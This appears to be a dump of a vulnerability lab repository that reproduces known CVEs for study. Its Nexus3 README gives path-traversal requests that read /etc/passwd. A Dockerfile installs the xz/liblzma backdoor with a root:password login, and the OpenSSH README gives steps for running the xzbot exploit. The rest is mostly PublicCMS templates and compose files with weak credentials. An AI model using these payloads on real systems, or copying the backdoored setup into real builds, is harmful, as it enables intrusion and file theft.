https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/LyLme_Spage/CVE-2024-34982/3.png
--------------------------------------------------------------------------------
/LyLme_Spage/CVE-2024-34982/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/LyLme_Spage/CVE-2024-34982/4.png
--------------------------------------------------------------------------------
/LyLme_Spage/CVE-2024-34982/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | php_web:
4 | image: shelter2024/lylme_spage-v1.9.5-web
5 | container_name: lylme_spage_v1.9.5-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "3306:3306"
10 | - "80:80"
11 | # volumes:
12 | # - ./apache-config:/etc/apache2/sites-available
13 | mysql:
14 | image: mysql:5.6
15 | container_name: lylme_spage_v1.9.5-mysql
16 | environment:
17 | - MYSQL_ROOT_PASSWORD=root
18 | - MYSQL_DATABASE= lylme_spage
19 | # volumes:
20 | # - ./database.sql:/docker-entrypoint-initdb.d/init.sql
21 |
--------------------------------------------------------------------------------
/MCMS/CNVD-2024-06148/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | java_web:
4 | image: shelter2024/mcms-v5.2.9-web
5 | container_name: mcms-v5.2.9-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "8080:8080"
10 |
11 | mysql:
12 | image: mysql:5.7
13 | container_name: mcms-v5.2.9-web-mysql
14 | environment:
15 | - MYSQL_ROOT_PASSWORD=root
16 | - MYSQL_DATABASE=mcms
17 | ports:
18 | - 3306:3306
19 |
20 | volumes:
21 | - ./mcms-5.2.9.sql:/docker-entrypoint-initdb.d/init.sql
22 |
--------------------------------------------------------------------------------
/Mini-Tmall/CVE-2024-2074/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '3'
2 | services:
3 | java_web:
4 | image: shelter2024/minitmall-20231017-web
5 | container_name: minitmall-20231017-web
6 | depends_on:
7 | - mysql
8 | ports:
9 | - "8080:8080"
10 |
11 | mysql:
12 | image: mysql:5.7
13 | container_name: minitmall-20231017-web-mysql
14 | environment:
15 | - MYSQL_ROOT_PASSWORD=root
16 | - MYSQL_DATABASE=tmalldemodb
17 | ports:
18 | - 3306:3306
19 |
20 | volumes:
21 | - ./tmalldemodb.sql:/docker-entrypoint-initdb.d/init.sql
22 |
--------------------------------------------------------------------------------
/Nexus3/CVE-2024-4956/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Nexus3/CVE-2024-4956/1.png
--------------------------------------------------------------------------------
/Nexus3/CVE-2024-4956/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/Nexus3/CVE-2024-4956/2.png
--------------------------------------------------------------------------------
/Nexus3/CVE-2024-4956/README.zh-cn.md:
--------------------------------------------------------------------------------
1 | # Sonatype Nexus Repository 路径遍历漏洞(CVE-2024-4956)
2 |
3 | Sonatype Nexus Repository 3(通常简称为Nexus3)是一个由Sonatype开发的仓库管理工具,用于管理和托管各种软件构件(如Maven构件、Docker镜像等),它提供了一种集中化的方式来存储、管理和分发软件构件,以帮助团队协作和构建自动化。
4 | Nexus Repository 3 中发现了一个路径遍历漏洞。该漏洞允许攻击者制作一个 URL,以下载任何文件,包括 Nexus Repository 应用程序范围之外的系统文件,而无需任何身份验证
5 |
6 | **影响版本**:<=nexus3:3.68.0
7 |
8 | **参考链接**:
9 |
10 | - https://support.sonatype.com/hc/en-us/articles/29416509323923
11 | - https://ethicalhacking.uk/cve-2024-4956-path-traversal-vulnerability-in-sonatype-nexus-repository-3/
12 |
13 | ## 漏洞环境
14 |
15 | 执行如下命令启动一个nexus3:3.68.0-web:
16 |
17 | ```
18 | docker run -p 8081:8081 --name nexus sonatype/nexus3:3.68.0-java8
19 | ```
20 |
21 | 
22 |
23 | ## 漏洞复现
24 |
25 | ```
26 | GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
27 | Host: 192.168.76.128:8081
28 | ```
29 |
30 | ```
31 | GET /%2F%2F%2F..%2F%2F.%2F%2F..%2F%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
32 | Host: 192.168.76.128:8081
33 | ```
34 |
35 | 
36 |
37 |
--------------------------------------------------------------------------------
/OpenMetadata/CVE-2024-28253/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/OpenMetadata/CVE-2024-28253/2.png
--------------------------------------------------------------------------------
/OpenMetadata/CVE-2024-28253/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/OpenMetadata/CVE-2024-28253/3.png
--------------------------------------------------------------------------------
/OpenMetadata/CVE-2024-28253/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/OpenMetadata/CVE-2024-28253/4.png
--------------------------------------------------------------------------------
/OpenMetadata/CVE-2024-28253/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/OpenMetadata/CVE-2024-28253/5.png
--------------------------------------------------------------------------------
/OpenMetadata/CVE-2024-28255/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/OpenMetadata/CVE-2024-28255/1.png
--------------------------------------------------------------------------------
/OpenMetadata/CVE-2024-28255/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/OpenMetadata/CVE-2024-28255/2.png
--------------------------------------------------------------------------------
/OpenMetadata/CVE-2024-28255/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/OpenMetadata/CVE-2024-28255/3.png
--------------------------------------------------------------------------------
/OpenSSH/CVE-2024-3094/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/OpenSSH/CVE-2024-3094/1.png
--------------------------------------------------------------------------------
/OpenSSH/CVE-2024-3094/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/OpenSSH/CVE-2024-3094/2.png
--------------------------------------------------------------------------------
/OpenSSH/CVE-2024-3094/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:22.04
2 |
3 | COPY start.sh /start.sh
4 |
5 | RUN chmod +x /start.sh
6 |
7 |
8 | RUN apt-get update \
9 | && DEBIAN_FRONTEND=noninteractive apt-get install -y \
10 | openssh-server \
11 | sudo \
12 | net-tools
13 |
14 |
15 | # xz backdoor
16 | COPY liblzma.so.5.6.1.patch /tmp/
17 | RUN cp /lib/x86_64-linux-gnu/liblzma.so.5 /lib/x86_64-linux-gnu/liblzma.so.5.bak
18 | RUN mv /tmp/liblzma.so.5.6.1.patch /lib/x86_64-linux-gnu/liblzma.so.5
19 |
20 |
21 |
22 |
23 | RUN mkdir /var/run/sshd \
24 | && echo 'root:password' | chpasswd \
25 | && sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config \
26 | && sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /etc/ssh/sshd_config \
27 | && sed -i 's/UsePAM yes/UsePAM no/' /etc/ssh/sshd_config
28 |
29 | CMD [ "/bin/bash", "-c", "/start.sh"]
30 |
--------------------------------------------------------------------------------
/OpenSSH/CVE-2024-3094/README.zh-cn.md:
--------------------------------------------------------------------------------
1 | # **OpenSSH** xz/liblzma 后门程序 RCE CVE-2024-3094
2 |
3 | xz是几乎存在于所有Linux发行版中的通用数据压缩格式,流行的Linux压缩工具XZ Utils被发现存在投毒供应链攻击,从 5.6.0 版本开始,xz 的上游 tarball 中发现了恶意代码。通过一系列复杂的混淆,liblzma 构建过程从源代码中存在的伪装测试文件中提取预构建的目标文件,然后使用该文件修改 liblzma 代码中的特定函数。这会产生一个修改后的 liblzma 库,任何链接到该库的软件都可以使用该库,拦截并修改与该库的数据交互。
4 |
5 | **影响版本** 影响5.6.0和5.6.1版本,CVSS评分10分.
6 |
7 |
8 |
9 | 参考连接
10 |
11 | - https://mp.weixin.qq.com/s/Hmvda8mcTasyEmAQHBO7aw
12 | - https://mp.weixin.qq.com/s/XY7hq9Li5VDfK-TfmRL9Cw
13 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3094
14 | - https://github.com/amlweems/xzbo
15 |
16 |
17 |
18 | ## 漏洞环境
19 |
20 | 执行如下命令启动漏洞环境
21 |
22 | ```
23 | docker build -t xzbot .
24 | docker run -p 22:22 --name xzbot xzbot
25 | ```
26 |
27 | ## 漏洞复现
28 |
29 | 1,下载exphttps://github.com/amlweems/xzbot,使用go语言进行编译
30 |
31 | ```
32 | go build main.go
33 | ```
34 |
35 | 2,发送如下命令
36 |
37 | 
38 |
39 | 3,打开容器镜像验证rce的执行
40 |
41 | 
42 |
43 |
44 |
--------------------------------------------------------------------------------
/OpenSSH/CVE-2024-3094/liblzma.so.5.6.0.patch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/OpenSSH/CVE-2024-3094/liblzma.so.5.6.0.patch
--------------------------------------------------------------------------------
/OpenSSH/CVE-2024-3094/liblzma.so.5.6.1.patch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/OpenSSH/CVE-2024-3094/liblzma.so.5.6.1.patch
--------------------------------------------------------------------------------
/OpenSSH/CVE-2024-3094/main.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/OpenSSH/CVE-2024-3094/main.exe
--------------------------------------------------------------------------------
/OpenSSH/CVE-2024-3094/start.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | /usr/sbin/sshd -D
4 | tail -f > /dev/null
5 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/1.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/2.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shelter1234/VulneraLab/5b1dcfc983746b91d52643d2dcea7eb21e94af76/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/3.png
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/mysql-config/default.conf:
--------------------------------------------------------------------------------
1 | [mysqld]
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/nginx-config/cms.conf:
--------------------------------------------------------------------------------
1 | upstream cms {
2 | #这里填写CMS的真实地址和端口,可使用多行以下配置启用集群
3 | ip_hash;
4 | server publiccms:8080 weight=1;
5 | }
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/nginx-config/site_1.conf:
--------------------------------------------------------------------------------
1 | #PublicCMS 站点配置
2 | server {
3 | listen 80;
4 | #listen 443 ssl;
5 |
6 | #ssl_certificate cert/xxx.pem;
7 | #ssl_certificate_key cert/xxx.key;
8 |
9 | ssi on;
10 | ssi_silent_errors on;
11 | location / {
12 | client_max_body_size 100m;
13 | proxy_redirect off;
14 | proxy_set_header Host $http_host;
15 | proxy_set_header X-Real-IP $remote_addr;
16 | proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
17 | proxy_set_header X-Forwarded-Proto $scheme;
18 | proxy_connect_timeout 5;
19 | proxy_send_timeout 30;
20 | proxy_read_timeout 10;
21 | proxy_pass http://cms;
22 | }
23 |
24 | location /include/ {
25 | alias /data/publiccms/web/site_1/include/;
26 | }
27 | location /webfile/ {
28 | alias /data/publiccms/web/site_1/webfile/;
29 | index index.html;
30 | }
31 |
32 | }
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/README.txt:
--------------------------------------------------------------------------------
1 | backup
2 | 删除文件备份,由系统自动创建
3 |
4 | dict
5 | 自定义分词文件目录
6 |
7 | history
8 | 文件修改历史,由系统自动创建
9 |
10 | indexes
11 | 全文搜索索引文件目录,由系统自动创建
12 |
13 | task
14 | 任务计划脚本目录
15 |
16 | template
17 | 站点模板目录
18 |
19 | web
20 | 静态文件目录
21 |
22 | install.lock
23 | 安装锁,由系统自动创建
24 |
25 | database.properties
26 | 数据库配置,由系统自动创建,其中jdbc.encryptPassword为加密数据库密码优先级高于jdbc.password
27 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/task/site_3/clearLog.task:
--------------------------------------------------------------------------------
1 | <#assign dealCount=0/>
2 | <@_clearLog>
3 | <#list result?keys as k>
4 | ${k}:${result[k]}<#assign dealCount+=result[k]/>
5 |
6 |
7 | 共清理${dealCount}条日志
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/task/site_3/nextContent.task:
--------------------------------------------------------------------------------
1 | <#assign pageCount=50/>
2 | <#assign dealCount=0/>
3 | <#-- 获取昨天发布的文章 -->
4 | <#assign dealDate=(.now?long-1000*3600*24)?number_to_date?string/>
5 | <@_contentList startPublishDate=dealDate ,pageIndex=1 count=pageCount>
6 | <#list 1..page.totalPage as n>
7 | <@_contentList startPublishDate=dealDate ,pageIndex=n count=pageCount>
8 | <#list page.list as a>
9 | <#-- 重新生成上一篇文章静态页面 -->
10 | <@_contentList categoryId=a.categoryId endPublishDate=a.publishDate orderField='publishDate' pageIndex=2 pageSize=1>
11 | <#if 2=page.pageIndex>
12 | <#list page.list as a>
13 | <@_publishContent id=a.id><#assign dealCount++/>
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 | 共生成${dealCount}条内容静态页面
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/task/site_3/publishAll.task:
--------------------------------------------------------------------------------
1 | <@include path="publishContent.task"/>
2 | <@include path="publishCategory.task"/>
3 | <@include path="publishContent.task"/>
4 | <@include path="publishCategory.task"/>
5 | <@include path="publishPage.task"/>
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/task/site_3/publishCategory.task:
--------------------------------------------------------------------------------
1 | <#assign dealCount=0/>
2 | <#assign maxPage=100/>
3 | <#macro deal parentId>
4 | <@_categoryList advanced=true parentId=parentId count=100>
5 | <#list page.list as a>
6 | <#if a.pageSize gt 500>
7 | <@_publishCategory id=a.id totalPage=1><#assign dealCount++/>
8 | <#else>
9 | <@_contentList categoryId=a.id containChild=a.containChild endPublishDate=.now count=a.pageSize>
10 | <#assign totalPage=page.totalPage/>
11 | <#if totalPage gt maxPage><#assign totalPage=maxPage/>
12 | <@_publishCategory id=a.id totalPage=totalPage><#assign dealCount++/>
13 |
14 |
15 | <#if a.childIds?has_content><@deal a.id/>
16 |
17 |
18 |
19 | <@deal ''/>
20 | 共生成${dealCount}个分类静态页面
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/task/site_3/publishContent.task:
--------------------------------------------------------------------------------
1 | <#assign pageCount=500/>
2 | <#assign dealCount=0/>
3 | <@cms.contentList advanced=true status=1 pageIndex=1 pageSize=pageCount>
4 | <#list 1..page.totalPage as n>
5 | <@cms.contentList advanced=true status=1 pageIndex=n pageSize=pageCount>
6 | <#list page.list as a>
7 | <@task.publishContent id=a.id><#assign dealCount++/>
8 |
9 |
10 |
11 |
12 | 共生成${dealCount}条内容静态页面
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/task/site_3/publishPage.task:
--------------------------------------------------------------------------------
1 | <@_publishPlace>
2 | <#list map?keys as k>
3 | ${k!} ${map[k]?string('成功','失败')}
4 |
5 |
6 | <@_publishPage>
7 | <#list map?keys as k>
8 | ${k!} ${map[k]?string('成功','失败')}
9 |
10 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/task/site_3/reCreateIndex.task:
--------------------------------------------------------------------------------
1 | <#assign pageCount=50/>
2 | <#assign dealCount=0/>
3 | <@_contentList advanced=true pageIndex=1 count=pageCount>
4 | <#list 1..page.totalPage as n>
5 | <@_contentList advanced=true pageIndex=n orderType='asc' count=pageCount>
6 | <#list page.list as a>
7 | <@_indexContent id=a.id/><#assign dealCount++/>
8 |
9 |
10 |
11 |
12 | 共生成${dealCount}条内容索引
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/task/site_4/nextContent.task:
--------------------------------------------------------------------------------
1 | <#assign pageCount=50/>
2 | <#assign dealCount=0/>
3 | <#-- 获取昨天发布的文章 -->
4 | <#assign dealDate=(.now?long-1000*3600*24)?number_to_date?string/>
5 | <@_contentList startPublishDate=dealDate ,pageIndex=1 count=pageCount>
6 | <#list 1..page.totalPage as n>
7 | <@_contentList startPublishDate=dealDate ,pageIndex=n count=pageCount>
8 | <#list page.list as a>
9 | <#-- 重新生成上一篇文章静态页面 -->
10 | <@_contentList categoryId=a.categoryId endPublishDate=a.publishDate orderField='publishDate' pageIndex=2 pageSize=1>
11 | <#if 2=page.pageIndex>
12 | <#list page.list as a>
13 | <@_publishContent id=a.id><#assign dealCount++/>
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 | 共生成${dealCount}条内容静态页面
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/task/site_4/publishAll.task:
--------------------------------------------------------------------------------
1 | <@include path="publishContent.task"/>
2 | <@include path="publishCategory.task"/>
3 | <@include path="publishContent.task"/>
4 | <@include path="publishCategory.task"/>
5 | <@include path="publishPage.task"/>
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/task/site_4/publishCategory.task:
--------------------------------------------------------------------------------
1 | <#assign dealCount=0/>
2 | <#assign maxPage=100/>
3 | <#macro deal parentId>
4 | <@_categoryList advanced=true parentId=parentId count=100>
5 | <#list page.list as a>
6 | <#if a.pageSize gt 500>
7 | <@_publishCategory id=a.id totalPage=1><#assign dealCount++/>
8 | <#else>
9 | <@_contentList categoryId=a.id containChild=a.containChild endPublishDate=.now count=a.pageSize>
10 | <#assign totalPage=page.totalPage/>
11 | <#if totalPage gt maxPage><#assign totalPage=maxPage/>
12 | <@_publishCategory id=a.id totalPage=totalPage><#assign dealCount++/>
13 |
14 |
15 | <#if a.childIds?has_content><@deal a.id/>
16 |
17 |
18 |
19 | <@deal ''/>
20 | 共生成${dealCount}个分类静态页面
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/task/site_4/publishContent.task:
--------------------------------------------------------------------------------
1 | <#assign pageCount=500/>
2 | <#assign dealCount=0/>
3 | <@cms.contentList advanced=true status=1 pageIndex=1 pageSize=pageCount>
4 | <#list 1..page.totalPage as n>
5 | <@cms.contentList advanced=true status=1 pageIndex=n pageSize=pageCount>
6 | <#list page.list as a>
7 | <@task.publishContent id=a.id><#assign dealCount++/>
8 |
9 |
10 |
11 |
12 | 共生成${dealCount}条内容静态页面
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/task/site_4/publishPage.task:
--------------------------------------------------------------------------------
1 | <@_publishPlace>
2 | <#list map?keys as k>
3 | ${k!} ${map[k]?string('成功','失败')}
4 |
5 |
6 | <@_publishPage>
7 | <#list map?keys as k>
8 | ${k!} ${map[k]?string('成功','失败')}
9 |
10 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_1/data.data:
--------------------------------------------------------------------------------
1 | {}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_1/metadata.data:
--------------------------------------------------------------------------------
1 | {"index_zh_cn.html":{"alias":"Home page in chinese","publishPath":null,"useDynamic":false,"needLogin":false,"needBody":false,"acceptParameters":"","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null},"index.html":{"alias":"Home page","publishPath":"index.html","useDynamic":true,"needLogin":false,"needBody":false,"acceptParameters":"","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_2/categoryType.data:
--------------------------------------------------------------------------------
1 | {"1":{"id":"1","name":"带文章的分类","onlyUrl":false,"sort":0,"templatePath":null,"path":"category/${category.id}","containChild":false,"pageSize":20,"extendList":[{"id":{"code":"article"},"required":false,"searchable":false,"maxlength":null,"width":null,"height":null,"name":"正文","description":"","inputType":"editor","defaultValue":"","dictionaryId":"","multiple":false,"sort":0}]}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_2/config.data:
--------------------------------------------------------------------------------
1 | {"siteAttribute":{"code":"siteAttribute","description":"站点扩展属性,可以在任意模板中使用","extendList":[{"id":{"code":"parentId"},"required":true,"maxlength":null,"sort":0,"name":"中文父栏目","description":"","inputType":"category","defaultValue":"","dictionaryId":""},{"id":{"code":"parentId_en"},"required":true,"maxlength":null,"sort":0,"name":"英文父栏目","description":"","inputType":"category","defaultValue":"","dictionaryId":""}]},"site":{"code":"site","description":"站点配置","extendList":[{"id":{"code":"statistics"},"required":false,"maxlength":null,"sort":0,"name":"统计代码","description":"统计JS代码,不包含script标签","inputType":"textarea","defaultValue":"","dictionaryId":""}]}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_2/data.data:
--------------------------------------------------------------------------------
1 | {"index.html":{"extendDataList":[{"name":"introduction","value":"今天的某某集团已经不再是过去的某某集团
"},{"name":"introduction_en","value":"Today's XX Group is no longer the XX Group of the past
"},{"name":"category","value":"84"},{"name":"category_en","value":"106"},{"name":"keywords","value":""},{"name":"description","value":""}]}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_2/en/metadata.data:
--------------------------------------------------------------------------------
1 | {"news.html":{"alias":"内容列表","publishPath":null,"useDynamic":true,"needLogin":false,"needBody":false,"acceptParameters":"id,pageIndex","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":{"id":{"type":"category","array":false,"required":true,"alias":"category"},"pageIndex":{"type":"number","array":false,"required":false,"alias":""}}},"content.html":{"alias":"内容","publishPath":null,"useDynamic":true,"needLogin":false,"needBody":false,"acceptParameters":"id,pageIndex","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null},"category.html":{"alias":"带文章分类","publishPath":null,"useDynamic":true,"needLogin":false,"needBody":true,"acceptParameters":"id","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":{"id":{"type":"category","array":false,"required":true,"alias":"category"}}}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_2/include/0dff168a-bc70-40d3-bf8f-c209dd598e5b.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
2 |
3 | - Home
4 | <@cms.categoryList parentId=(siteAttribute.parentId_en)!''>
5 | <#list page.list as a>
6 | -
7 | ${a.name}
8 | <#if a.childIds?has_content>
9 | <@cms.categoryList parentId=a.id>
10 |
11 | <#list page.list as a>
12 | - ${a.name}
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
3 |
4 |
5 | <#items as a>
6 | -
7 |
8 |
9 |
10 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
2 |
3 | - 首页
4 | <@cms.categoryList parentId=(siteAttribute.parentId)!''>
5 | <#list page.list as a>
6 | -
7 | ${a.name}
8 | <#if a.childIds?has_content>
9 | <@cms.categoryList parentId=a.id>
10 |
11 | <#list page.list as a>
12 | - ${a.name}
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
Sorry, the page you requested is not found!
10 |
13 |
14 |
23 |
24 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_3/error/404.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | 404 Error
5 |
6 |
7 |
8 |
9 | Sorry, the page you requested is not found!
10 |
13 |
14 |
23 |
24 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_3/error/metadata.data:
--------------------------------------------------------------------------------
1 | {"404.html":{"alias":"","publishPath":"","useDynamic":true,"needLogin":false,"needBody":false,"acceptParameters":"","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null},"403.html":{"alias":"","publishPath":"","useDynamic":true,"needLogin":false,"needBody":false,"acceptParameters":"","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null},"500.html":{"alias":"","publishPath":"","useDynamic":true,"needLogin":false,"needBody":false,"acceptParameters":"","cacheTime":0,"contentType":"","extendList":null,"parameterTypeMap":null}}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_3/ftl/category_page.ftl:
--------------------------------------------------------------------------------
1 | <#if page??>
2 |
3 | <#if !page.firstPage>
4 |
上一页
5 | <#else>
6 |
上一页
7 |
8 | <#assign start=1/>
9 | <#if (page.pageIndex-5) gt start>
10 | <#assign start=page.pageIndex-4/>
11 |
12 | <#assign end=page.totalPage/>
13 | <#if (page.pageIndex+5) lt end>
14 | <#assign end=page.pageIndex+4/>
15 |
16 | <#if start gt 1>
17 |
1 ...
18 |
19 | <#list start..end as n>
class="selected">${n}
20 | <#if end lt page.totalPage>
21 | ...
${page.totalPage}
22 |
23 | <#if !page.lastPage>
24 |
下一页
25 | <#else>
26 |
下一页
27 |
28 |
3 | <#if !page.firstPage>
4 |
上一页
5 | <#else>
6 |
上一页
7 |
8 | <#list 1..page.totalCount as a>
class="selected">${a}
9 | <#if !page.lastPage>
10 |
下一页
11 | <#else>
12 |
下一页
13 |
14 |
3 |
精彩图集
4 |
5 |
6 | <#items as a>
7 |
13 |
14 |
15 |
16 |
17 |
2 |
编辑推荐
3 | <#list page.list>
4 |
9 |
10 |
站内搜索
2 |
3 |
7 | <@cms.wordList count=6>
8 |
9 | 热门搜索:
10 | <#list page.list as a>
11 | ${a.name}
12 |
13 |
14 |
15 |
2 |
3 | <#list page.list as a>
4 |
5 |
6 |
7 |
8 |
${object.name!}
7 |
8 | <#list page.list as a>
9 | <@include path="/ftl/data-list.ftl"/>
10 |
11 |
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_3/include/ff78be16-6f75-42b3-b115-d9d9cf578f1c.html:
--------------------------------------------------------------------------------
1 | <#list page.list as a>
2 |
14 |
15 |
21 |
22 |
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_3/member/data.data:
--------------------------------------------------------------------------------
1 | {}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_3/member/getcsrf.html:
--------------------------------------------------------------------------------
1 | <#if user?has_content&&userId=user.id>{"csrf":"<@tools.csrfToken/>"}
--------------------------------------------------------------------------------
/PublicCMS/PublicCMS 后台模块 站点执行脚本RCE漏洞/data/publiccms/template/site_3/member/logout.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | ${(metadata.alias)!}
5 | <@tools.includePlace path="/76c53ac2-4f88-4ef3-984b-c81d00a48089.html"/> <#-- 头部Header -->
6 |
7 |
8 | <@tools.includePlace path="/23e95a91-0063-4498-99ef-aa3fc4a79c4c.html"/> <#-- 导航 -->
9 |
10 |
17 |
18 | <@tools.includePlace path="/cc29e896-332a-46d8-9bcb-d48e92144e9c.html"/> <#-- 尾部Footer -->
19 |
22 |
23 |
24 |
--------------------------------------------------------------------------------
